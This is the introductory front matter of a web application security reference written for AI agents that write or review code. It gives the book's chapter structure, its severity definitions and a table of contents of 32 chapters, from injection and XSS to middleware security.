Web Application Security for AI Agents

Web Application Security for AI Agents

A comprehensive, agent-optimized reference for building, reviewing, and securing web applications. Written as original content informed by deep study of the field's canonical works, OWASP standards, and current threat research.

---

How to Use This Book

This book is structured for AI agents that write, review, or audit web application code. Each chapter is self-contained — you can load any chapter independently without reading prior chapters.

Chapter structure:

• Threat Summary — what this chapter covers (2-3 sentences)
• Severity — CRITICAL, HIGH, MEDIUM, or LOW
• Quick Reference — decision table or checklist
• Core Rules — numbered, actionable principles
• Examples — vulnerable code vs. secure code, annotated
• Verification — how to confirm the fix works
• Common Mistakes — anti-patterns to avoid

When to use this book:

• Writing new web application code (check relevant chapters before implementation)
• Reviewing code for security issues (use checklists as review guides)
• Debugging security vulnerabilities (find the chapter matching the vulnerability class)
• Designing authentication, authorization, or session management systems

Severity definitions:

• CRITICAL — Direct path to full system compromise, data breach, or account takeover
• HIGH — Significant security impact, exploitable without special conditions
• MEDIUM — Security impact requires specific conditions or user interaction
• LOW — Minor information disclosure or defense-in-depth concern

---

Table of Contents

1. Chapter 1: The Foundational Security Axiom (p. 2)
2. Chapter 2: Injection Attacks (p. 3)
3. Chapter 3: Cross-Site Scripting (XSS) (p. 4)
4. Chapter 4: Authentication Security (p. 5)
5. Chapter 5: Session Management (p. 6)
6. Chapter 6: Access Control and Authorization (p. 7)
7. Chapter 7: API Security (p. 8)
8. Chapter 8: Server-Side Request Forgery (SSRF) (p. 9)
9. Chapter 9: Cross-Site Request Forgery (CSRF) (p. 10)
10. Chapter 10: File Upload Security (p. 11)
11. Chapter 11: Cryptography and Transport Security (p. 12)
12. Chapter 12: Security Headers and Browser Defenses (p. 13)
13. Chapter 13: Client-Side Security (p. 14)
14. Chapter 14: Business Logic Vulnerabilities (p. 15)
15. Chapter 15: Supply Chain Security (p. 16)
16. Chapter 16: Cloud-Native Web Security (p. 17)
17. Chapter 17: Deserialization Attacks (p. 18)
18. Chapter 18: Race Conditions (p. 19)
19. Chapter 19: Path Traversal and File Access (p. 20)
20. Chapter 20: Error Handling and Information Disclosure (p. 21)
21. Chapter 21: Security Testing Methodology (p. 22)
22. Chapter 22: Secure Development Checklist (p. 23)
23. Chapter 23: Secure Design Patterns (p. 24)
24. Chapter 24: Server-Side JavaScript Security (p. 25)
25. Chapter 25: Modern Framework Security (p. 26)
26. Chapter 26: ORM and Database Layer Security (p. 27)
27. Chapter 27: Payment and Financial Security (p. 28)
28. Chapter 28: Security Logging, Monitoring, and Audit Trails (p. 29)
29. Chapter 29: Credential Lifecycle Management (p. 30)
30. Chapter 30: Privacy, Data Protection, and Compliance (p. 31)
31. Chapter 31: Server-Generated Code and Dynamic Output Injection (p. 32)
32. Chapter 32: Middleware Architecture and Route Security (p. 33)

---